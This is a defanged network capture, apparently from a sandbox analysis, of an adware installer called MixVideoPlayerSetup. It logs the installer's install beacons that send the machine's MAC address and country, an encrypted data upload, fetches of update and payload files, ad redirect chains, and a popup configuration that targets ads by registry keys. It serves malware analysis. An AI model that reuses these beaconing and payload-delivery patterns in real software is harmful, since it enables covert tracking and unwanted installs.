Location: hXXp://VVV.webtrackerplus.com/?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.&ce_cid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.


HEAD /84/MixVideoPlayerSetup.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Host: static.yousoftpe.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:04 GMT
Content-Type: application/octet-stream
Content-Length: 3789056
Connection: keep-alive
Last-Modified: Fri, 05 Jun 2015 11:17:43 GMT
ETag: "55718557-39d100"
Accept-Ranges: bytes


GET /ltv/install/?idapp=23&action=install&mac=000C290DDD4A&country=US HTTP/1.1
Host: ltv-pre.tguhost.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Content-Type: xml
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.7
Cache-Control: no-cache
Date: Sat, 06 Jun 2015 00:26:39 GMT
39..<?xml version="1.0" encoding="utf-8"?>.<result>1</result>..0..


GET /?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: asmzz.exclusiverewards.startree.science
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.4
Date: Sat, 06 Jun 2015 00:26:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
X-Powered-By: PHP/5.3.3
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ci_session=xZprAEsUzrdEkX6CbrGXhhft/rFHoGKI5+XwEnsrw/UHP3QkX7eYHCgjPENvAfqx+2gfFYRGDY9RhjsMfhdPeddLnICtx/ySuLVBm+TTMp3JEd1yQOnzw5k4Gfqiuqu5Zf48gENlW4xApVM1kkLqPsTEj4cfeSfyOYq3Mq4Ie0+/G/iYROU1tbXakSVWerAv5B6gvaKB6VxBX8b/FtmEvP+tll3/qzP2aV1gisLlLEHNLVr9bIAukUB/pV1EwnGd5NCDfOeooNaSD0k7N4zH8NGS5WIKchU/DZmuvkr3MAKdE+1CN7nZ3dpQZaM02PlZD9bYXsrTGncl/kL/P3qaqFCEO2h4mM0JSFPgf6BsmHjCjP5f7qEQjdSXlds5hq+yMODKxDr3/0G4WNZQ3/rBNkWFunA0evJZSXGsTKLtme7Q43zJLSDBjs4/GoXbwdSBecmk4KkIqFxDTRPQZfALhg==; expires=Sun, 07-Jun-2015 00:26:07 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
X-Source: Mini
Set-Cookie: id=XNSX.-r10845-t68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: SITE_ID=73001201; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: sov=73001201; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tov=deleted; expires=Fri, 06-Jun-2014 00:26:06 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: mov=nr.ytsurvey.mini; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: redid=10845; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: gsid=68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: ref=deleted; expires=Fri, 06-Jun-2014 00:26:06 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: URI=sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: templateid=2582; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: version=227198; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tags[2582][expand_enable]=-1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tags[2582][alert_enable]=1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tags[2582][audio_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tags[2582][pop_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tags[227198][expand_enable]=-1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tags[227198][alert_enable]=1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tags[227198][audio_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tags[227198][pop_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: content=227198; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: vid=40637; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: log_73001201=1; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.exclusiverewards.startree.science
Set-Cookie: id=XNSX.-r10845-t68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: SITE_ID=73001201; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: sov=73001201; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: tov=227198; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: mov=nr.ytsurvey.mini; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: redid=10845; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: gsid=68; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Set-Cookie: ref=deleted; expires=Fri, 06-Jun-2014 00:26:06 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
X-Sov: 73001201
X-Rot: 227198
Set-Cookie: tags[2582][iframe_enable]=0; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.asmzz.exclusiverewards.startree.science
Expires: Mon, 01 Jan 2001 00:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: noshid=hljlntjxhrlrjrz; expires=Sun, 07-Jun-2015 00:27:47 GMT; path=/; domain=.startree.science
Content-Encoding: gzip

<<< skipped >>>

GET /templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style.css HTTP/1.1

Accept: */*
Referer: hXXp://asmzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: asmzz.exclusiverewards.startree.science
Connection: Keep-Alive
Cookie: ci_session=xZprAEsUzrdEkX6CbrGXhhft/rFHoGKI5+XwEnsrw/UHP3QkX7eYHCgjPENvAfqx+2gfFYRGDY9RhjsMfhdPeddLnICtx/ySuLVBm+TTMp3JEd1yQOnzw5k4Gfqiuqu5Zf48gENlW4xApVM1kkLqPsTEj4cfeSfyOYq3Mq4Ie0+/G/iYROU1tbXakSVWerAv5B6gvaKB6VxBX8b/FtmEvP+tll3/qzP2aV1gisLlLEHNLVr9bIAukUB/pV1EwnGd5NCDfOeooNaSD0k7N4zH8NGS5WIKchU/DZmuvkr3MAKdE+1CN7nZ3dpQZaM02PlZD9bYXsrTGncl/kL/P3qaqFCEO2h4mM0JSFPgf6BsmHjCjP5f7qEQjdSXlds5hq+yMODKxDr3/0G4WNZQ3/rBNkWFunA0evJZSXGsTKLtme7Q43zJLSDBjs4/GoXbwdSBecmk4KkIqFxDTRPQZfALhg==; id=XNSX.-r10845-t68; SITE_ID=73001201; sov=73001201; mov=nr.ytsurvey.mini; redid=10845; gsid=68; URI=sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68; templateid=2582; path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; version=227198; tags[2582][expand_enable]=-1; tags[2582][alert_enable]=1; tags[2582][audio_enable]=0; tags[2582][pop_enable]=0; tags[227198][expand_enable]=-1; tags[227198][alert_enable]=1; tags[227198][audio_enable]=0; t
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 06 Jun 2015 00:26:10 GMT
Content-Type: text/css
Last-Modified: Fri, 11 Oct 2013 18:30:45 GMT
Transfer-Encoding: chunked
Expires: Tue, 31 May 2016 00:26:10 GMT
Cache-Control: max-age=31104000
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Encoding: gzip

<<< skipped >>>

GET /templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/js/script.js HTTP/1.1

Accept: */*
Referer: hXXp://asmzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: asmzz.exclusiverewards.startree.science
Connection: Keep-Alive
Cookie: ci_session=xZprAEsUzrdEkX6CbrGXhhft/rFHoGKI5+XwEnsrw/UHP3QkX7eYHCgjPENvAfqx+2gfFYRGDY9RhjsMfhdPeddLnICtx/ySuLVBm+TTMp3JEd1yQOnzw5k4Gfqiuqu5Zf48gENlW4xApVM1kkLqPsTEj4cfeSfyOYq3Mq4Ie0+/G/iYROU1tbXakSVWerAv5B6gvaKB6VxBX8b/FtmEvP+tll3/qzP2aV1gisLlLEHNLVr9bIAukUB/pV1EwnGd5NCDfOeooNaSD0k7N4zH8NGS5WIKchU/DZmuvkr3MAKdE+1CN7nZ3dpQZaM02PlZD9bYXsrTGncl/kL/P3qaqFCEO2h4mM0JSFPgf6BsmHjCjP5f7qEQjdSXlds5hq+yMODKxDr3/0G4WNZQ3/rBNkWFunA0evJZSXGsTKLtme7Q43zJLSDBjs4/GoXbwdSBecmk4KkIqFxDTRPQZfALhg==; id=XNSX.-r10845-t68; SITE_ID=73001201; sov=73001201; mov=nr.ytsurvey.mini; redid=10845; gsid=68; URI=sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68; templateid=2582; path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; version=227198; tags[2582][expand_enable]=-1; tags[2582][alert_enable]=1; tags[2582][audio_enable]=0; tags[2582][pop_enable]=0; tags[227198][expand_enable]=-1; tags[227198][alert_enable]=1; tags[227198][audio_enable]=0; ta
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Sat, 06 Jun 2015 00:26:10 GMT
Content-Type: application/javascript
Last-Modified: Fri, 11 Oct 2013 18:30:48 GMT
Transfer-Encoding: chunked
Expires: Tue, 31 May 2016 00:26:10 GMT
Cache-Control: max-age=31104000
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Encoding: gzip

<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/bullet-short.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:09 GMT
Content-Type: image/gif
Content-Length: 54
Last-Modified: Fri, 27 Feb 2015 14:06:53 GMT
Connection: keep-alive
ETag: "54f079fd-36"
Accept-Ranges: bytes
GIF89a.............!.......,...................P..U..;



POST /5c9fcfb67b8b50caf3ff80fda5f90c17f2908cdc58dc8a332caa164c680aca4d3d2a2f887f13872573de854a95eea05b833f5cf0a0c8699f HTTP/1.1

User-Agent: dBrowser 3 CallGetResponse:3
Host: api.yousoftpe.com
Content-Length: 4006
Cache-Control: no-cache

cdata=86394263D6DED7AD3ED013DFEF7E64F6FD7F7EB6471F6E1008FAF67D6BFDB01B26EAAA801BC7C09F4151D3761C9F974F6921D434084F69EB0E2262EC981EFAF4B71B6DE53AB1621839F9301B469E85E3DEEA269604ED17849843D57DA5D052460EA403F0E2730A705291EE1BB655062579317F3835A3F1C8D611E8D59DE4E29330C729C3611175A91D6C4B2CA57BF51B8A93E962C0C6C7C6FD68E8538140D7179A18D7BCE232EF1C1C0A61A0FC128EFA35879CE800C42FE7ED6DD7260C2A734FD494B2C250259201C61772E42F1834C5441D06379FFA40F46894C31933E48BDA957A476C0D2DA52AB22D25163CA51C0265C33430C2CCDC2445DB733784FAF2387F2028217CF16B47693BE71A94A31D04FEC270C62AA77F5607A856310D3163700B9358E90F7D346FCC65CFCEB261A852FC730CFC5512A46C99D7521B0CEB0A7AB836EB90C4968390E70FBE66142A024A56DCD1FF2C37F69104A76D9C65E8C995026485C84E02B717CB69E1DEE79A5B7163A85418804D4732B853988DC447F077EDBE26ADDD2D6491B936C16D6FDA0CBE8C32A9E47A43291E06605D7327A003427FA57088F709FEA77EF306CA4BFEF54BDAEDF7E4F54FF66DB4CD09C36F722294E15B4466C6626B87D934840432CEAB2D0F2D5CD256D16454ADD9ACD51EA2376FD7ABDAC2DC20C1CE4FC529377AACD629FFED22A89B2F4422D24E82882AF7AA2C1A16BB81C3838A8D3EB3E18BBEF18D60DC1B234AC6A358521720470391E8CFDF41099A29F798B6EC70E827139413E513DA51D7708F4957B91AC64EBB6FD47BCACAF081BD0D876AEEB0C3A09A3ED5BA4F85EBBC8F97F88B9899F77E1B84AD58BCEBFBA8B236534DAF1C60FCFEF16CB364963AB371E91C1C08792FDC29952F850065D8D
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:38 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
7..MAXTHX...0..


GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/style.css HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: api.yousoftpe.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:25:59 GMT
Content-Type: text/css
Content-Length: 19034
Last-Modified: Tue, 03 Mar 2015 18:13:58 GMT
Connection: keep-alive
ETag: "54f5f9e6-4a5a"
Accept-Ranges: bytes
/* Template Template Videoupdater */...article,aside,details,figcaptio
n,figure,.footer,header,hgroup,menu,nav,section {..display:block;.}.p,
h5, h4, h3, h2, h1, span, ul, li, form, input, textarea {..margin:0;.
.padding:0;.}.body {..margin:0 auto;..background-color:#323333;..width
: 555px;..height: 458px;..color:#b5b5b5;..font-family:Arial, Helvetica
, sans-serif;..scrollbar-face-color: #666666;..scrollbar-highlight-col
or: #999999;..scrollbar-3dlight-color: #333333;..scrollbar-shadow-colo
r: #333333;..scrollbar-darkshadow-color: #333333;..scrollbar-arrow-col
or: #CCCCCC;..scrollbar-track-color: #333333;.}...videupdater a, .vide
updater span {..color:#b5b5b5;.}...clear {..clear:both;..height:0px;..
overflow:inherit;..display: none;.}..li {..list-style: none;.}./******
***************//*********************//*********************//*******
**************//********./* estilo para poner los botones del box.html
todos en display none */.._Bnext, .._Bexit, .._Bdecline, .._Bomit {..
/*display:none;*/.}./*************************************************
*/..container {..float:left;..width:555px;..height: 458px;..background
-color:#323333;..margin: 0 auto;.}../*****************Template Win_Lin
k*****************/......minimize {..float: right;..width: 45px;..posi
tion: relative;..margin-right: -45px;..right: 45px;..margin-top: 12px;
..z-index: 9999;.}....minimize ul li {..display: inline;..float: left;
.}...minimize li {....float: left;..} ....minimize .button-min {..col
or: #636363;..text-decoration: none;..border: none;..font-size: 17

<<< skipped >>>

GET /?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000.&ce_cid=20Wzkj0hKoBMRsqv0Ggk9v1z11W5000. HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.webtrackerplus.com
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Sat, 06 Jun 2015 00:26:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
location: hXXp://3p6.popularfastchannel.com/?s1=&s2=&s3=
Set-Cookie: SERVERID=web5; path=/
Set-Cookie: visid_incap_227739=oVdrpO2pS1WJl6aDrCoZzR0 clUAAAAAQUIPAAAAAABdFW8qAPL1FEbaM auxILz; expires=Sun, 04 Jun 2017 08:58:26 GMT; path=/; Domain=.webtrackerplus.com
Set-Cookie: incap_ses_323_227739=x6PtTy9u5WEwE2/p84Z7BB0 clUAAAAAJsFkeDKv4ZXzGHbWM71EFQ==; path=/; Domain=.webtrackerplus.com
Set-Cookie: ___utmvmFPupvfO=ZtWRQrIoebn; path=/; Max-Age=900
Set-Cookie: ___utmvaFPupvfO=Koo.wPNM; path=/; Max-Age=900
Set-Cookie: ___utmvbFPupvfO=hZd
    XmyOqali: ptI; path=/; Max-Age=900
X-Iinfo: 6-71821477-71821478 NNNN CT(117 -1 0) RT(1433550365070 8) q(0 0 1 0) r(3 3) U5
X-CDN: Incapsula
0..


GET /sdb/1d/MixVideoPlayerUpdate.xml?44812e3f-d43a-4eb7-8bef-8c0aefa2ce28 HTTP/1.1
Host: staticrr.mixvideoplayer.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:41 GMT
Content-Type: text/xml
Content-Length: 671
Last-Modified: Fri, 05 Jun 2015 11:17:56 GMT
Connection: keep-alive
ETag: "55718564-29f"
Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8"?>..
<LastVersion>...
<url>hXXp://staticrr.mixvideoplayer.com/sdb/84/MixVideoPlayerSetup.exe</url>...
<version>1.0.0.20</version>...
<TrackActivity>true</TrackActivity>...
<TrackErrors>true</TrackErrors>...
<vast active="true">....
<adnum>3</adnum>....
<adurl countries="US,RU,BR,MX,DE,FR,IN,GB,ES,TR,AR,IT,IL,JP,CA,IR,AU,NL,ID,CO,PK">.....
<![CDATA[hXXp://ads.adaptv.advertising.com/a/h/fUUYX443fr3iHLf1b0DAy3MvZmqN m4YhR8Ql84ugxaUwnVer0nkAl4RaFw4ippAh4iKfLnbLyk=?cb=[CACHE_BREAKER]&pageUrl=apps://mixvideoplayer.com&eov=eov]]>....
</adurl>...
</vast>...
<CollectorLTV>collector-pre.ltv-analytics.com:8080</CollectorLTV>..
</LastVersion>

<<< skipped >>>

GET /templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style-ie.css HTTP/1.1
Accept: */*
Referer: hXXp://asmzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: asmzz.exclusiverewards.startree.science
Connection: Keep-Alive
Cookie: ci_session=xZprAEsUzrdEkX6CbrGXhhft/rFHoGKI5+XwEnsrw/UHP3QkX7eYHCgjPENvAfqx+2gfFYRGDY9RhjsMfhdPeddLnICtx/ySuLVBm+TTMp3JEd1yQOnzw5k4Gfqiuqu5Zf48gENlW4xApVM1kkLqPsTEj4cfeSfyOYq3Mq4Ie0+/G/iYROU1tbXakSVWerAv5B6gvaKB6VxBX8b/FtmEvP+tll3/qzP2aV1gisLlLEHNLVr9bIAukUB/pV1EwnGd5NCDfOeooNaSD0k7N4zH8NGS5WIKchU/DZmuvkr3MAKdE+1CN7nZ3dpQZaM02PlZD9bYXsrTGncl/kL/P3qaqFCEO2h4mM0JSFPgf6BsmHjCjP5f7qEQjdSXlds5hq+yMODKxDr3/0G4WNZQ3/rBNkWFunA0evJZSXGsTKLtme7Q43zJLSDBjs4/GoXbwdSBecmk4KkIqFxDTRPQZfALhg==; id=XNSX.-r10845-t68; SITE_ID=73001201; sov=73001201; mov=nr.ytsurvey.mini; redid=10845; gsid=68; URI=sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68; templateid=2582; path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; version=227198; tags[2582][expand_enable]=-1; tags[2582][alert_enable]=1; tags[2582][audio_enable]=0; tags[2582][pop_enable]=0; tags[227198][expand_enable]=-1; tags[227198][alert_enable]=1; tags[227198][audio_enable]=0
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Sat, 06 Jun 2015 00:26:10 GMT
Content-Type: text/css
Last-Modified: Fri, 11 Oct 2013 18:30:44 GMT
Transfer-Encoding: chunked
Expires: Tue, 31 May 2016 00:26:10 GMT
Cache-Control: max-age=31104000
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
Content-Encoding: gzip

<<< skipped >>>

GET /ajax/libs/jquery/1.10.2/jquery.min.js HTTP/1.1
Accept: */*
Referer: hXXp://asmzz.exclusiverewards.startree.science/?sov=73001201&hid=hljlntjxhrlrjrz&redid=10845&gsid=68&id=XNSX.-r10845-t68
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ajax.googleapis.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Tue, 09 Jul 2013 11:31:25 GMT
Date: Tue, 02 Jun 2015 18:01:26 GMT
Expires: Wed, 01 Jun 2016 18:01:26 GMT
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 32822
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 282283
Alternate-Protocol: 80:quic,p=0

<<< skipped >>>

GET /ads?key=5d7c4c519bcd79cc1dca058af3cfebbc&width=0&height=0 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: n149adserv.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO PSA OUR"
Set-Cookie: epomUUID=9d806520-0be2-11e5-8e44-f8bc125381b8; Domain=.n149adserv.com; Expires=Fri, 01-Jun-2035 00:26:03 GMT; Path=/
Set-Cookie: ep_5d7c4c519bcd79cc1dca058af3cfebbc=1433550363763|579; Domain=.n149adserv.com; Expires=Sun, 07-Jun-2015 00:26:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 966
Date: Sat, 06 Jun 2015 00:26:02 GMT
<html><head><!--579:53--></head>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<meta http-equiv="refresh" content="0; url=hXXp://network.adsmarket.com/click/jGJunWecqZmPY2mWYcp6w4iQa5tnnH6Wi2SYmGakfZSJkGqaYKOBl7dia5Vmon2X?dp=NTN8NTc5fFVBfDF8MXx8|34ee69d9819b5a94df7268d81470e3f3-17-62|9d806520-0be2-11e5-8e44-f8bc125381b8" />
<script type="text/javascript">
var params = {}; var res = []; if (localStorage!==null && typeof localStorage!==null && typeof localStorage != "undefined" && typeof localStorage.epomCookies != "undefined") params = JSON.parse(localStorage.epomCookies); for (var p in params) res.push(p+"="+params[p]);new Image().src = "hXXp://n149adserv.com"+"/im"+"pressi"+"on.gif?b=579"+"&p=53&ch=&ap=&cps=&c"+"=62&l=UA"+"&h=2ce0467e4efaca9f0a762ccd5280ba2d&t="+new Date().getTime()+"&s=f312f1562460e629fdc063bb064533f4&"+res.join('&');
</script></body></html>..

<<< skipped >>>

GET /sdb/df/ffmpeg.zip HTTP/1.0
Host: staticrr.mixvideoplayer.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:20 GMT
Content-Type: application/zip
Content-Length: 10143125
Last-Modified: Thu, 21 May 2015 14:48:35 GMT
Connection: close
ETag: "555df043-9ac595"
Accept-Ranges: bytes

<<< skipped >>>

GET /sdb/e0/WebBrowser.xml?d9db319c-edf4-4c23-ae40-ba3c3738dc0f HTTP/1.1
Host: staticrr.mixvideoplayer.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 06 Jun 2015 00:26:48 GMT
Content-Type: text/xml
Content-Length: 4250
Last-Modified: Mon, 18 May 2015 14:02:05 GMT
Connection: keep-alive
ETag: "5559f0dd-109a"
Accept-Ranges: bytes
<Popup>..
<Version>1.0.0.10</Version>.
<Enabled>true</Enabled>..
<Size height="768" width="1000"/>.
<FrecuencyPerHour>3</FrecuencyPerHour>.
<MaxWindows>4</MaxWindows>.
<LaunchDate>07/01/2015</LaunchDate>.
<Url container="popup">hXXp://VVV.wbredirect.com</Url>..
<UrlNotAllowedCountries countries="AE,IR,IL,EG,CN,BA,RS,TH,IN,CZ,ID,VN,PH,PK" container="popup">hXXp://network.adsmarket.com/click/jGJunWecqZmOZnCXYcp6w4iQa5xgn36bi2SYm2Gif5mJkGqXXpt-lbdia5hhn3qX</UrlNotAllowedCountries>.
<UrlByRegister>...
<Url container="browser" key="HKLM\SOFTWARE" priority="5"><![CDATA[hXXp://n149adserv.com/ads?key=8a35d9a5b93c671dcef88419ab81871b&width=0&height=0]]></Url>...
<Url container="browser" key="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TeamSpeak 3 Client" priority="5"><![CDATA[hXXp://n149adserv.com/ads?key=0d8448124f556ffceee148f60ea374f6&width=0&height=0]]></Url>...
<Url container="browser" key="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RaidCall" priority="5"><![CDATA[hXXp://n149adserv.com/ads?key=0d8448124f556ffceee148f60ea374f6&width=0&height=0]]></Url>...
<Url container="browser" key="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EEB3F6BB-318D-4CE5-989F-8191FCBFB578}" priority="5"><![CDATA[hXXp://n149adserv.com/ads?key=0d8448124f556ffceee148f60ea374f6&width=0&height=0]]></Url>...
<Url container

<<< skipped >>>

GET /d5/msjava.dll HTTP/1.1
Accept: */*
Proxy-Authorization: Basic 
